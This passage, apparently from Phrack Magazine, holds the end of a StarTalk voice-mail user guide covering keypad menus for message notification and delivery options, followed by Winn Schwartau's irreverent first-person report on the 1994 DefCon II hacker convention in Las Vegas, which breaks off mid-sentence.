    Note:  While you are entering a telephone number, you can press a dialpad
    number to represent dialtone recognition or other telephone number options.
    When StarTalk is installed with PBX or Centrex and you want to access an
    outside line, you must enter the command to recognize dial tone.  For
    example enter 9 to access an outside line, press # then enter 4 to
    recognize dialtone press 2 followed by the destination number, press #
    and any required pauses.   Each pause entered is four seconds long.
8.  To end the telephone number, press #
9.  To accept the telephone number, press #
10. To accept the destination type telephone, press # and move to step 12.
    To change the destination type to pager, press 1
    Note: The destination type can be either telephone or pager.  StarTalk
    automatically selects telephone.  When the pager destination
    type is selected, a pause must be inserted.  The number of pauses
    required depends on the pager system being used.
11. To accept the destination type, press #
    If the message destination type is a telephone, you must set a start time.
12. Enter the time when Off-premise Message Notification is to start.
    Note: This is a four-digit field.  Any single digit hour and minute
    must be preceded by a zero.
13. Press 1 for AM, 2 for PM.
14. To accept the start time, press #
15. Enter the time when Off-premise Message Notification is to stop.
    Note : This is a four-digit field.  Any single digit hour and
    minute must be preceded by a zero.
16. Press 1 for AM, 2 for PM.
17. To accept the stop time, press #
18. To accept the message type NEW, press #
    To change the message type to URGENT, press 1
    Note: The default message type is NEW. This means you are notified
    whenever you receive a new message.  Changing the message type changes
    NEW to URGENT.  This means you are only notified when you receive an
    urgent message.
19. To accept the message type, press #

The Off-premise Message Notification will begin as soon as the start time
is reached.  You will be called whenever you receive a message.


Disabling Off-premise Message Notification
------------------------------------------
To disable Off-premise Message Notification, you must first open your
mailbox, Once your mailbox is open:

1. Open the mailbox admin menu, press 8
2. To access the message notification menu, press 6
3. To listen to the options, press 2
4. To disable message notification, press 1

Off-premise Message Notification is disabled.

Changing Off-premise Message Notification
-----------------------------------------
To change Off-premise Message Notification, you must first open your mailbox,
Once you have opened your mailbox:

1.  Open the mailbox admin menu, press 8
2.  Open the message notification menu, press 6
3.  To change message notification press 1
4.  To select a line, press 1
5.  Press 1
    If you wish to change the line, press #
6.  Enter the new line number.
7.  To end the line number, press #
8.  To accept the line number, press #
9.  Press 1
    If you do not wish to change the destination telephone number, press #
10. Enter the new destination telephone number.
11. To end the telephone number, press #
12. To accept the telephone number, press #
13. To change the destination type, press 1
14. To accept the destination type, press #
15. To change the start time, press 1
    If you do not wish to change the time, press #
16. Enter the time when Off-premise Message Notification is to start.
17. Press 1 for AM, 2 for PM.
18. To accept the start time, press #
19. To change the stop time, press 1
    If you do not wish to change the time, press #
20. Enter the time when Off-premise Message Notification is to stop.
21. Press 1 for AM, 2 for PM.
22. To accept the stop time, press #
23. To change the message type, press 1
24. To accept the message type, press #

Leaving a Mailbox Message
-------------------------
You can leave a message directly in any StarTalk mailbox, as long as that
mailbox has been initialized.

To leave a mailbox message:

1. Enter the mailbox # and at the tone, record your message.
2. To end your recording, press #
3. For delivery options, press 3
4. To send your message, press #

Message Delivery Options
------------------------
StarTalk provides you with four message delivery options, which are:

Certified 1 - This delivery option sends you a message and tells you if
              the person received and read your message, but this is
              only if the message is inside the system.

Urgent    2 - This delivery option marks the message, and plays it before
              playing other messages left in your mailbox.

Private   3 - This delivery option prevents a message from being forwarded
              to another mailbox.

Normal    # - This delivery option sends a message to a mailbox.  Normal
              messages are played in the order in which they are received,
              and can be forwarded to other mailboxes.

After you have recorded your mailbox message, press 3 to access delivery
options.  To use one of the delivery options, press the right delivery
option number.

Note: When leaving a message, you can press 9 to listen to StarTalk voice
      prompts in the alternate language.

Assigning the Target Attendant
------------------------------
Anyone that presses [0] when they are connected to your box will be
transferred  to an operator if your Target Attendant is set to [0] or her
mailbox #.

To change from the Operator to the Target Attendant -

1. Press 8
2. Press 5
3. Press 1
4. Enter <desired extension>
5. Press *

Quick Reference Tips
--------------------

 - To save time, you can just interrupt most prompts by press # or selecting
   a StarTalk option.

 - If you get lost using StarTalk options, press * to replay the option list

 ```````````````````````````````````````````````````````````````````````````
 Ok, this is the end of the StarTalk voice mail guide.  I tried my best
 to make it as simple as I could with respect to both hacking it
 and using it.  I plan on writing my next file on Smooth Operator, a
 PC-based information processing system.  I will probably focus more on
 the terminal part of it.  I will try and cover the logins and all other
 things needed to get around the system.  If any readers out there have
 comments or suggestions on this article, or on my next article, please
 contact me.

 If you would like to talk about this, you can find me on IRC with the nick
 'redskull' or you can write me a message on my Internet Address.
 Internet Address : redskull@io.org

 I'd like to thank S. Cleft for giving me some tips and also discovering
 some of the things I've mentioned in this file.

 ````````````````````````````````````````````````````````````````````````````


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 19 of 28

****************************************************************************

                      DefCon II: Las Vegas

                  Cyber-Christ meets Lady Luck

                        July 22-24, 1994

                        by Winn Schwartau
              		   (C) 1994
         

Las  Vegas connotes radically different images to radically  dif
ferent  folks.   The Rat Pack of Sinatra, Dean Martin  and  Sammy 
Davis  Jr.  elicits up the glistening self-indulgent  imagery  of  
Vegas'   neon  organized  crime in the  '50's   (Ocean's  Eleven 
displayed only minor hacking skills.)

Then  there's the daily bus loads of elderly nickel  slot  gam
blers from Los Angeles and Palm Springs who have nothing  better 
to  do  for twenty out of twenty four hours each  day.   (Their 
dead  husbands were golf hacks.)   Midwesterners  now  throng to 
the Mississippi River for cheap gambling.

Recreational vehicles of semi-trailor length from East  Bullock, 
Montana  and  Euclid, Oklahoma and Benign, Ohio clog  routes  80 
and 40 and 10 to descend with a vengeance upon an asphalt  home 
away  from home in the parking lot of Circus Circus.  By  cul
tural demand, every Rv'er worth his salt must, at least once in 
his life,  indulge in the depravity of Glitter Gulch.  

And  so they come, compelled by the invisibly insidious  derelict 
attraction  of a desert Mecca whose only purpose in life  is  to 
suck  the  available  cash from  addicted  visitor's  electronic 
purses of ATM and VISA cards. (Hacker?  Nah . . .)

Vegas  also has the distinction of being home to the largest  of 
the largest conventions and exhibitions in the world.   Comdex 
is the world's largest computer convention where 150,000  techno-
dweebs  and  silk  suited glib  techno-marketers  display  their 
wares  to a public who is still paying off  the 20% per  annum 
debt  on last year's greatest new electronic gismo which  is 
now rendered thoroughly obsolete.  And the Vegas Consumer  Elec
tronic  Show does for consumer electronics what the First  Amend
ment does for pornography.  (Hackers, are we getting close?)

In between, hundreds upon hundreds of small conferences and 
conventions  and sales meetings and annual excuses  for  excess 
all  select Las Vegas as the ultimate host city.  Whatever  you 
want, no matter how decadent, blasphemous, illegal or immoral, at 
any  hour, is yours for the asking, if you have cash or a  clean 
piece of plastic.  

So, it comes as no surprise, that sooner or later, (and it turns 
out to be sooner) that the hackers of the world, the computer 
hackers, phone phreaks, cyber-spooks, Information Warriors, data 
bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, 
virus  writers  and  perhaps the occasional  Cyber  Christ  again 
picked Las Vegas as the 1994 site for DefCon II. 

You see, hackers are like everyone else (sort of) and so they, 
too, decided that their community was also entitled to hold 
conferences and conventions.

DefCon  (as opposed to Xmas's HoHoCon), is the  premier  mid-year 
hacker extravaganza.  Indulgence gone wild, Vegas notwithstanding 
if  previous Cons are any example; but now put a  few  hundred 
techno-anarchists  together in sin city USA, stir  in  liberal 
doses  of  illicit controlled pharmaceutical substances, and  we 
have a party that Hunter Thompson would be proud to attend.

All  the while, as this anarchistic renegade regiment marches  to 
the tune of a 24 hour city, they are under complete  surveillance 
of  the authorities.  Authorities like the FBI, the Secret  Serv
ice,  telephone security . . . maybe even Interpol.  And how  did 
the  "man"  arrive in tow behind the techno-slovens  that  belong 
behind bars?

They were invited.

And so was I.  Invited to speak. (Loose translation for standing 
up  in front of hundreds of hackers and being verbally  skewered 
for having an opinion not in 100% accordance with their own.)   

"C'mon,  it'll be fun," I was assured by DefCon's organizer,  the 
Dark Tangent.

"Sure  fired way to become mutilated monkey meat,"  I  responded.  
Some  hackers just can't take a joke, especially after  a  prison 
sentence and no opposite-sex sex.

"No really, they want to talk to you . . ."

"I bet."

It's  not that I dislike hackers - on the contrary.  I have  even 
let a few into my home to play with my kids.  It's just that,  so 
many  of the antics that hackers have precipitated at  other Cons 
have  earned them a reputation of disdain by all, save those  who 
remember  their own non-technical adolescent shenanigans.  And  I 
guess I'm no different.  I've heard the tales of depraved  indif
ference,  hotel  hold-ups, government raids on folks  with  names 
similar to those who are wanted for pushing the wrong key on  the 
keyboard and getting caught for it.  I wanted to see teens and X-
generation types with their eyes so star sapphire glazed over that 
I could trade them for chips at the craps table.   

Does  the truth live up to the fiction?  God, I hope so. It'd  be 
downright  awful and unAmerican if 500 crazed hackers didn't  get 
into at least some serious trouble.  

So I go to Vegas because, because, well, it's gonna be fun.  And, 
if I'm lucky, I might even see an alien spaceship.  

For you see, the party has already begun.


I  go to about 30 conventions and conferences a year, but  rarely 
if ever am I so Tylonol and Aphrin dosed that I decide to go with 
a severe head cold.  Sympomatic relief notwithstanding I  debated 
and  debated, and since my entire family was down with  the  same 
ailment  I figured Vegas was as good a place to be as at home  in 
bed.   If  I could survive the four and half  hour  plane  flight 
without  my  Eustahian tubes rocketing through my ear  drums  and 
causing  irreparable damage, I had it made.

The  flight was made tolerable becuase I scuba dive.   Every  few 
minutes I drowned out the drone of the engines by honking  uncon
trollably  like  Felix  Ungerto without his  aspirator.   To  the 
chagrin of my outspoken counter surveillance expert and traveling 
mate,  Mike  Peros and the rest of the first  class  cabin,   the 
captain reluctantly allowed be to remain on the flight and not be 
expelled sans parachute somewhere over Southfork, Texas.   Snort, 
snort.  Due to extensive flirting with the two ladies across  the 
aisle, we made the two thousand mile trek in something less  than 
34  minutes . . . or so it seemed.  Time flies took on new  mean
ing. 

For  those who don't know, the Sahara Hotel is the dregs  of  the 
Strip.   We were not destined for Caesar's or the MGM or  any  of 
the  new multi-gazillion dollar hotel cum casinos  which  produce 
pedestrian  stopping  extravaganzas as an inducement to  suck  in 
little old ladies to pour endless rolls of Washington quarters in 
mechanical  bottomless pits. The Sahara was built some 200  years 
ago  by native slave labor whose idea of plumbing is  clean  sand 
and  decorators  more concerned with a mention in Mud  Hut  Daily 
than Architectural Digest.  It was just as depressingly dingy and 
solicitly low class as it was when I forced to spend eleven  days 
there (also with a killer case of the flu) for an extended Comdex 
computer show.  But, hey, for a hacker show, it was top flight.  

"What hackers?" The desk clerk said when I asked about the show.

I explained.  Computer hackers: the best from all over the  coun
try.  "I hear even Cyber Christ himself might appear."

Her  quizzical  look emphasized her pause.  Better  to  ignore  a 
question   not understood than to look stupid.  "Oh,  they'll  be 
fine,  We have excellent security."  The security people, I found 
out  shortly thereafter knew even less: "What's a  hacker?"   Too 
much  desert sun takes its toll.  Proof positive photons are  bad 
for neurons.  

Since it was still only 9PM Mike and I sucked down a couple of $1 
Heinekens in the casino and fought it out with Lineman's  Switch
ing  Union representatives who were also having their  convention 
at the Sahara.  Good taste in hotels goes a long way.  

"$70,000  a  year to turn a light from red to  green?"   we  com
plained.

"It's a tension filled job . . .and the overtime is murder."

"Why a union?"

"To protect our rights."

"What rights?"

"To make sure we don't get replaced by a computer . . ."

"Yeah,"   I  agreed.   "That  would  be  sad.   No  more   Amtrak 
disasters."  The crowd got ugly so we made a hasty retreat  under 
the scrutiny of casino security to our rooms. Saved.

Perhaps  if  I  noticed or had read the  original  propaganda  on 
DefCon, I might have known that nothing significant was going  to 
take  place  until the following (Friday) evening  I  might  have 
missed all the fun.

For  at around 8AM, my congestion filled cavities  and  throbbing 
head was awakened by the sound of an exploding toilet.  It's kind 
of  hard  to  explain what this sounds like.   Imagine  a  toilet 
flushing  through  a  three megawatt sound system  at  a  Rolling 
Stones concert. Add to that the sound of a hundred thousand   flu 
victims standing in an echo chamber cleansng their sinuses into a 
mountain  of  Kleenex while three dozen  football  referees  blow 
their foul whistles in unison, and you still won't come close  to 
the  sheer cacophonous volume that my Saharan toilet exuded  from 
within its bowels.  And all for my benefit.  

The  hotel  manager  thought I was kidding.  "What  do  you  mean 
exploded?"

"Which word do you not understand?" I growled in my early morning 
sub-sonic voice.  "If you don't care, I don't."  

My  bed was floating.  Three or maybe 12 inches of water  created 
the damnedest little tidal wave I'd ever seen, and the sight  and 
sound  of  Lake Meade in room 1487 only exascerbatd the  pressing 
need to relieve myself.  I dried my feet on the extra bed linens, 
worried  about electrocution and fell back asleep. It could  have 
been  3  minutes or three hours later - I have no way to  know  -  
but  my hypnogoic state was rudely interrupted by  hotel  mainte
nance pounding at the door with three fully operational  muffler-
less jack hammers.

"I  can't  open  it," I bellowed over the continual  roar  of  my 
personal  Vesuvius Waterfall.  "Just c'mon in."   The  fourteenth 
floor hallway had to resemble an underwater coral display becuase 
the door opened ever so slowly..

"Holy Christ!"  

Choking  back  what would have been a painful laugh,  I  somehow 
eeked out the words, with  a smirk, "Now you know what an explo-
ding  toilet  is like."

For,  I  swear, the next two hours three men  whose  English  was 
worse  than a dead Armadillo attempted to suck up the Nile  River 
from my room and the hallway.  Until that very moment in time,  I 
didn't  know  that  hotels were outfitted  with  vacuum  cleaners 
specifically designed to vacuum water.  Perhaps this is a regular 
event.


Everyone  who has ever suffered through one bitches  about  Vegas 
buffets,  and  even the hackers steered away  from  the  Sahara's  
$1.95  "all you can eat" room: "The Sahara's buffet is the  worst 
in  town;  worse than Circus Circus."  But since I  had  left  my 
taste  buds  at 37,000 feet along with schrapneled pieces  of  my 
inner ear, I sought out sustenance only to keep me alive  another 
24 hours.

By mid afternoon, I had convinced myself that outside was not the 
place  to be. After only eighteen minutes of  120  sidewalk  egg-
cooking  degrees, the hot desert winds took what was left  of  my 
breath  away  and with no functioning airways as it was,  I  knew 
this  was  a big mistake.  So, hacker convention, ready  or  not, 
here I come.

Now,  you  have to keep in mind that Las Vegas  floor  plans  are 
designed  with  a singular purpose in mind. No matter  where  you 
need to go, from Point A to Point B or Point C or D or  anywhere, 
the traffic control regulations mandated by the local police  and 
banks require that you walk by a minimum of 4,350 slot  machines, 
187  gaming  tables of various persuasions and no  less  than  17 
bars.  Have they no remorse?  Madison Avenue ad execs take heed! 

So, lest I spend the next 40 years of my life in circular pursuit 
of  a  sign-less hacker convention losing every last  farthing  I 
inherited from dead Englishmen, I asked for the well hidden loca-
tion at the hotel lobby.

"What  hackers?"  There goes that nasty photon  triggered  neuron 
depletion again.

"The computer hackers."

"What computer hackers.  We don't have no stinking hackers . . ."  
Desk clerk humor, my oxymoron for the week.
 
I tried the name: DefCon II.

"Are  we going to war?"  one ex-military Uzi-wielding guard  said 
recognizing the etymology of the term. 

"Yesh, it's true"  I used my most convincing tone. "The  Khasaks
tanis  are coming with nuclear tipped lances riding hundred  foot 
tall  horses.   Paris has already fallen.  Berlin  is  in  ruins.  
Aren't you on the list to defend this great land?"

"Sure as shit am!"   He scampered off to the nearest phone in  an 
effort  to  be the first on the front lines.   Neuron  deficiency 
beyong surgical repair..

I  slithered down umpteen hallways and casino aisles lost in  the 
jungle of jingling  change.   Where the  hell  are  the  hackers?   
"They must be there," another neuron-impoverished Saharan employ
ee said as he pointed towards a set of escalators at the very far 
end of the casino.  

All the way at the end of the almost 1/4 mile trek through  Sodom 
and Gonorrhea an 'up' escalator promised to take me to hackerdom.  
Saved  at last.  Upstairs.  A conference looking area.  No  signs 
anywhere,  save  one of those little black  Velcro-like  stick-em 
signs where you can press on white block letters.

	               No Mo Feds

I must be getting close. Aha, a maintenance person; I'll ask him.  
"What hackers?  What's DefCon."

Back  downstairs,  through the casino, to the  front  desk,  back 
through  the casino, up the same escalator again. Room One I  was 
told.   Room  One  was empty.  Figures.  But, at the  end  of   a 
hallway,  past the men's room and the phones, and  around  behind 
Room One I saw what I was looking for: a couple of dozen T-shirt
ed,  Seattle grunged out kids (read: under 30) sitting at  uncov
ered  six foot folding tables hawking their DefCon  II  clothing, 
sucking  on Heinekens and amusing themselves with  widely  strewn 
backpacks and computers and cell phones.

I had arrived!

			* * * *

You  know,  regular old suit and tie conferences  could  learn  a 
thing or two from Jeff Moss, the man behind DefCon II.  No  fancy 
badge making equipment; no $75 per hour union labor built  regis
tration  desks; no big signs proclaiming the wealth of  knowledge 
to  be gained by signing up early.  Just a couple of kids with  a 
sheet of paper and a laptop.  

It turned out I was expected.  They handed me my badge and what a 
badge it was.  I'm color blind, but this badge put any psychedel
ically induced spectral display to shame.  In fact it was a close  
match  to the Sahara's mid 60's tasteless casino carpeting  which 
is so chosen as to hide the most disgusting regurgative blessing.  
But better and classier.

The neat thing was, you could (in fact had to) fill out your  own 
badge  once  your name was crossed off the piece  of  paper  that 
represented the attendee list.  

Name:
Subject of Interest:
E-Mail:

Fill  it  out  any way you want.  Real name,  fake  name,  alias, 
handle  - it really doesn't matter cause the  hacker  underground 
ethic  encourages anonymity.  "We'd rather not know who  you  are 
anyway, unless you're a Fed.  Are you a Fed?"

A  couple of lucky hackers wore the ultimate badge of honor.   An 
"I  Spotted A Fed" T-shirt.  This elite group sat or lay  on  the 
ground watching and scouring the registration area for signs that 
someone,  anyone, was a Fed.  They really didn't care or  not  if 
you  were a Fed - they wanted the free T-shirt and the  peer  re
spect that it brought.

I'm over 30 (OK, over 35) and more than a few times (OK, a little 
over 40) I had to vehemently deny being a Fed.  Finally Jeff Moss 
came to the rescue.

"He's not a Fed.  He's a security guy and a writer."

"Ugh!  That's worse.  Can I get a T-shirt cause he's  a  writer?"  
No way hacker-breath.

Jeff.   Jeff Moss. Not what I expected.  I went to school with  a 
thousand Jeff Mosses.  While I had hair down to my waist, wearing 
paisley leather fringe jackets and striped bell bottoms so wide I 
appeared to be standing on two inverted ice cream cones, the Jeff 
Mosses  of  the world kept  their parents  proud.   Short,  short 
cropped  hair,  acceented by an ashen pall and  clothes  I  stlll 
wouldn't  wear  today.  They could get away with  anything  cause 
they  didn't look the part of radical chic.  Jeff, I really  like 
Jeff: he doesn't look like what he represents.  Bruce  Edelstein, 
(now of HP fame) used to work for me.  He was hipper than hip but 
looked squarer than square.  Now today that doesn't mean as  much 
as  it used to, but we ex-30-somethings have a hard time  forget
ting  what rebellion was about. (I was suspended 17 times in  the 
first semester of 10th grade for wearing jeans.)

Jeff  would  fit into a Corporate Board Meeting if  he  wore  the 
right suit and uttered the right eloquencies:  Yes, that's it:  A 
young  Tom Hanks.  Right.  I used to hate Tom Hanks (Splash,  how 
fucking stupid except for the TV-picture tube splitting  squeals) 
but  I've come to respect the hell out of him as an actor.   Jeff 
never  had to pass through that first phase.  I  instantly  liked 
him and certainly respect his ability to pull off a full  fledged 
conference for only $5000.  

You  read  right. Five grand and off to Vegas with  300  of  your 
closest personal friends, Feds in tow, for a weekend of electron
ic  debauchery.   "A few hundred for the brochure, a few  hundred 
hear, a ton in phone bills, yeah, about $5000 if no one does  any 
damage."   Big time security shows cost $200,000 and up.   I  can 
honestly  say  without meaning anything pejorative at any  of  my 
friends and busienss acquaintances, that I do not learn 40  times 
as  much  at the 'real' shows.  Something is definitely out of  
whack  here.  Suits want to see suits.  Suits want to see  fancy.  
Suits want to see form, substance be damned.  Suits should take a 
lesson from my friend Jeff.

			* * * * *

I again suffered through a tasteless Saharan buffer dinner  which 
cost me a whopping $7.95.  I hate grits - buttered sand is what I 
call  them  - but in this case might well have  been  preferable.  
Somehow  I  coerced a few hackers to join me in  the  ritualistic 
slaughter of our taste buds and torture of our intestines.   They 
were  not pleased with my choice of dining, but then who gives  a 
shit?  I couldn't taste anything anyway.  Tough. 

To keep our minds off of the food we talked about something much 
more pleasant: the recent round of attacks on Pentagon  computers 
and  networks.  "Are the same people involved as in the  sniffing 
attacks earlier this year?" I asked my triad of dinner mates. 

"Indubitably."

"And what's the reaction from the underground - other hackers?"

Coughs, sniffs.  Derisive visual feedback. Sneers. The finger.

"We can't stand 'em.  They're making it bad for everybody."   Two 
fingers.

By and large the DefCon II hackers are what I call 'good hackers' 
who hack, and maybe crack some systems upon occasion, but  aren't 
what  I refer to as Information Warriors in the bad sense of  the 
word.   This group claimed to extol the same position as most  of 
the  underground  would:   the Pentagon sniffing  crackers  -  or 
whoever  who  is assaulting thousands of computers on the  net  - 
must be stopped. 

"Scum bags, that what they are."  I asked that they not sugarcoat 
their feelings on my behalf.  I can take it.  "These fuckers  are 
beyond belief; they're mean and don't give a shit how much damage 
they  do."  We played with our food only to indulge in the single 
most  palatable edible on display: ice cream with gobs of  choco
late syrup with a side of coffee. . 

The big question was, what to do?  The authorities are  certainly 
looking  for a legal response; perhaps another Mitnick or  Phiber 
Optik.   Much  of  the underground cheered when  Mark  Abene  and 
others from the reknowned Masters of Destruction went to spend  a 
vacation  at the expense of the Feds.  The MoD was up to no  good 
and  despite  Abene's cries that there was no such thing  as  the 
MoD, he lost and was put away.  However many hackers believe as I 
do, that sending Phiber to jail for hacking was the wrong punish
ment.  Jail time won't solve anything nor cure a hacker from  his 
first  love.   One might as well try to cure a  hungry  man  from 
eating:   No, Mark did wrong, but sending him to jail was  wrong, 
too.   The  Feds and local computer cops and the courts have  to   
come  up with punishments appropriate to the crime.  Cyber-crimes 
(or cyber-errors) should not be rewarded by a trip to an all male 
hotel where the favorite toy is a phallically carved bar of soap.

On  the other hand, hackers in general are so incensed  over  the 
recent swell of headline grabbing break-ins, and law  enforcement 
has  thus far appeared to be impotent, ("These guys  are  good.") 
that many are searching for alternative means of retribution.

"An IRA style knee capping is in order," said one.

"That's  not  good enough, not enough pain," chimed  in  another.  
(Sip, sip. I can almost taste the coffee.)

"Are  you  guys serious?" I asked.  Violence?  You? I  thought  I 
knew them better than that. I know a lot of hackers, none that  I 
know  of  is  violent,  and this  extreme  Pensacola  retribution 
attitude seemed tottally out of character.  "You really  wouldn't 
do that, would you?"  My dinner companions were so upset and they 
claimed to echo the sentiment of all good-hackers in good  stand
ing, that yes, this was a viable consideration.

"The Feds aren't doing it, so what choice do we have?  I've heard 
talk  about  taking up a collection to pay for a hit man .  .  ."  
Laughter around, but nervous laughter. 

"You wouldn't. . ." I insisted.

"Well,  probably  not  us, but that  doesn't  mean  someone  else 
doesn't won't do it." 

"So you know who's behind this whole thing."

"Fucking-A  we do," said yet another hacker chomping at the  bit. 
He was obviously envisioning himself  with a baseball bat in  his 
hand.

"So do the Feds."

So now I find myself in the dilemma of publishing the open secret 
of who's behind the Internet sniffing and Pentagon break ins, but 
after  talking  to people from both the underground and  law  en
forcement,  I think I'll hold off awhile  It serves no  immediate 
purpose other than to warn off the offenders, and none of us want 
that.

Obviously all is not well in hacker-dom.

			* * * * *

The  registration  area  was beyond  full;  computers,  backpacks 
everywhere,  hundreds  of what I have to refer to as kids  and  a 
fair number of above ground security people.  Padgett Peterson of 
Martin  Marietta was going to talk about viruses, Sara Gordon  on 
privacy, Mark Aldrich is a security guy from DC., and a  bunch of   
other  folks I see on the seemingly endless security  trade  show 
circuit. Jeff Moss had marketed himself and the show excellently.  
Los Angeles sent a TV crew, John Markoff from the New York  Times 
popped  in as did a writer from Business Week.  (And  of  course, 
yours truly.) 

Of  the  360 registrees ("Plus whoever snuck in," added  Jeff)  I 
guess about 20% were so-called legitimate security people. That's 
not to belittle the mid-20's folks who came not because they were 
hackers, but because they like computers.  Period.  They hack for 
themselves and not on other systems, but DefCon II offered  some
thing for everyone.  

I  remember 25 years ago how my parents hated the way  I  dressed 
for  school or concerts or just to hang out: God forbid! We  wore 
those damned jeans and T-shirts and sneakers or boots! "Why can't 
you dress like a human being," my mother admonished me day  after 
day,  year after year.  So I had to check myself because I  can't 
relate  to Seattle grunge-ware. I'm just too damned old  to  wear 
shirts that fit like kilts or sequin crusted S&M leather  straps.  
Other   than  the  visual  cacophony  of  dress,   every   single 
hacker/phreak that I met exceeded my expectations in the area  of 
deportment.

These  are not wild kids on a rampage.  The stories  of  drug-in
duced  frenzies  and peeing in the hallways  and  tossing  entire 
rooms  of  furniture  out of the window that  emanated  from  the 
HoHoCons  seemed  a million miles away.  This was  admittedly  an 
opportunity  to party, but not to excess.  There was work  to  be 
done, lessons to be learned and new friends to make.  So  getting 
snot  nosed drunk or ripped to the tits or Ecstatically high  was 
just not part of the equation.  Not here.

Now   Vegas  offers something quite distinct  from  other  cities 
which host security or other conventions.  At a Hyatt or a Hilton 
or  any other fancy-ass over priced hotel, beers run $4 or  $5  a 
crack  plus  you're expected to tip the black tied  minimum  wage 
worker  for  popping the top.  The Sahara (for all of  the  other 
indignities we had to suffer) somewhat redeemed  itself by offer
ing an infinite supply of $1 Heinekens. Despite hundreds of  beer 
bottle  spread  around the huge conference area  (the  hotel  was 
definitely  stingy in the garbage pail business) public  drunken
ness  was  totally absent.  Party yes.  Out of control?  No  way.  
Kudos!

Surprisingly, a fair number of women (girls) attended.  A handful 
were there 'for the ride' but others . . . whoa! they know  their 
shit. 

I hope that's not sexist; merely an observation.  I run across so 
few  technically fluent ladies it's just a gut reaction.  I  wish 
there  were more.  In a former life, I owned a TV/Record  produc
tion  company called Nashville North. We specialized  in  country 
rock taking advantage of the Urban Cowboy fad in the late 1970's. 
Our crew of producers and engineers consisted of the   "Nashville  
Angels."  And boy what a ruckus they would cause when we recorded 
Charlie  Daniels  or Hank Williams: they  were  stunning.   Susan 
produced and was a double for Jacqueline Smith; we  called  Sally 
"Sabrina"  because  of her boyish appearance and  resemblance  to 
Kate Jackson.  A super engineer.  And there was Rubia Bomba,  the 
Blond  Bombshell,  Sherra,  who I eventually  married:  she  knew 
country music inside and out - after all she came from  Nashville 
in the first place.  

When we would be scheduled to record an act for live radio,  some 
huge famous country act like Asleep at The Wheel of Merle Haggard 
or Johnny Paycheck or Vassar Clements, she would wince in  disbe
lief when we cried, "who's that?"  Needless to say, she knew  the 
songs, the cues and the words.  They all sounded alike.   Country 
Music?  Ecch.  (So I learned.)

At  any rate, ladies, we're equal opportunity  offenders.   C'mon 
down and let's get technical.

As  the  throngs pressed to register, I saw an old  friend,  Erik 
Bloodaxe.   I've  known him for several years now and  he's  even 
come  over to baby sit the kids when he's in town.   (Good  prac
tice.)    Erik  is about as famous as they come in the  world  of 
hackers.   Above ground the authorities investigated him for  his 
alleged  participation in cyber crimes: after all, he was one  of 
the  founders of the Legion of Doom, and so, by default, he  must 
have done something wrong.  Never prosecuted, Erik Bloodaxe lives 
in  infamy amongst his peers.  To belay any naysayers,  Erik  ap
peared on every single T-shirt there.

			"I Only Hack For Money,"
				 Erik Bloodaxe

proclaimed  dozens of shirts wandering through  the  surveillance 
laden casinos. His is a name that will live in infamy.  

So  I  yelled  out, "Hey Chris!"  He gave  his  net-name  to  the 
desk/table registrar. "Erik Bloodaxe."

"Erik  Bloodaxe?"  piped up an excited high pitched  male  voice.  
"Where?"  People pointed at Chris who was about to be  embarrass
ingly amused by sweet little tubby Novocain who practically bowed 
at Chris's feet in reverence.  "You're Erik Bloodaxe?"   Novocain 
said  with nervous awe - eyes gleaming up at Chris's  ruddy  skin 
and blond pony-tail.  

"Yeah,"  Chris  said in the most off handed  way  possible.   For 
people who don't know him this might be interpreted as  arrogance 
(and yes there is that) but he also has trouble publicly  accept
ing  the  fame  and respect that  his  endearing  next-generation 
teenage fans pour on him.

"Wow!"  Novocain  said with elegance and panache.   "You're  Erik 
Bloodaxe."  We'd just been through that said Chris's eyes.

"Yeah."

"Wow,  well,  um,  I  . . . ah . . . you're . . .  I  mean,  wow, 
you're  the best."  What does Sylvia Jane Miller from  Rumpsteer, 
Iowa  say to a movie star?  This about covered it.   The  Midwest 
meets  Madonna.   "Wow!"   Only here it's  Novocain  meets  Cyber 
Christ himself.



Like any other security show or conference or convention there is 
a kickoff, generally with a speech.  And DefCon II was no  excep
tion.  Except.

Most conventional conventions (ConCons) start at 7:30 or 8:00  AM 
because, well,  I don't know exactly why, except that's when  so-
called  suits are expected to show up in their cubicles.     Def
Con, on the other hand, was scheduled to start at 10PM on  Friday 
night  when  most  hakcers show up for work.  Most  everyone  had 
arrived  and we were anxiously awaiting the  opening  ceremonies.  
But, here is where Jeff's lack of experience came in.  The  kick-
off speaker was supposed to be Mark Ludwig of  virus writing fame 
and controversy.  But, he wasn't there!

He had jet lag.

"From Phoenix?" I exclaimed in mock horror to which nearby  hack
ers saw the absurdity of a 45 minute flight jet lag.  Mark has  a 
small  frame and looks, well, downright weak, so I figured  maybe 
flying  and  his constitution just didn't get along  and  he  was 
massaging his swollen adenoids in his room.  

"Oh,  no!  He's  just come in from Australia . .  ."   Well  that 
explains it, alright!  Sorry for the aspersions, Mark.

But Jeff didn't have a back up plan. He was screwed.  Almost four 
hundred people in the audience and nothing to tell them.  So, and 
I can't quite believe it, one human being who had obviously never 
stood  in front of a live audience before got up in an  impromptu 
attempt  at stand up comedy.  The audience was ready  for  almost 
anything  entertaining but this guy wasn't. Admittedly it  was  a 
tough spot, but . . .

"How do you turn a 486 into an 8088?"  

"Add Windows."  Groan. Groan.

"What's  this?"  Picture the middle three fingers of  your  right 
hand wiggling madly.

"An  encrypted  this!"   Now hold out  just  the  middle  finger.  
Groan.  Groan.

"What's  this?"   Spread your legs slightly  apart,  extend  both 
hands to the front and move them around quickly in small circles.

"Group Air Mouse."  Groan. 

The  evening  groaned on with no Mark nor any able  sharp  witted 
comedian in sight. 



Phil  Zimmerman wrote PGP and is a God, if not Cyber-Christ  him
self to much of the global electronic world.  Preferring to  call 
himself a folk hero (even the Wall Street Journal used that term) 
Phil's diminutive height combined with a few too many pounds  and 
a  sweet  as sweet can be smile earn him the title  of  Pillsbury 
Dough  Boy look alike.  Phil is simply too nice a guy to  be  em
broiled  in a Federal investigation to determine if he broke  the 
law  by  having PGP put on a net site.  You see, the  Feds  still 
think  they can control Cyberspace, and thereby maintain  antique 
export laws: "Thou shalt not export crypto without our  approval" 
sayeth the NSA using the Department of Commerce as a whipping boy 
mouth  piece.  So now Phil faces 41-51 months of  mandatory  jail 
time if prosecuted and convicted of these absurd laws.  

Flying  in from Colorado, his appearance was  anxiously  awaited. 
"He's really coming?"  " I wonder what he's like?"  (Like  every
one  else, fool, just different.)  When he did arrive, his  shit-
eating  grin  which really isn't a shit-eating  grin,  it's  just 
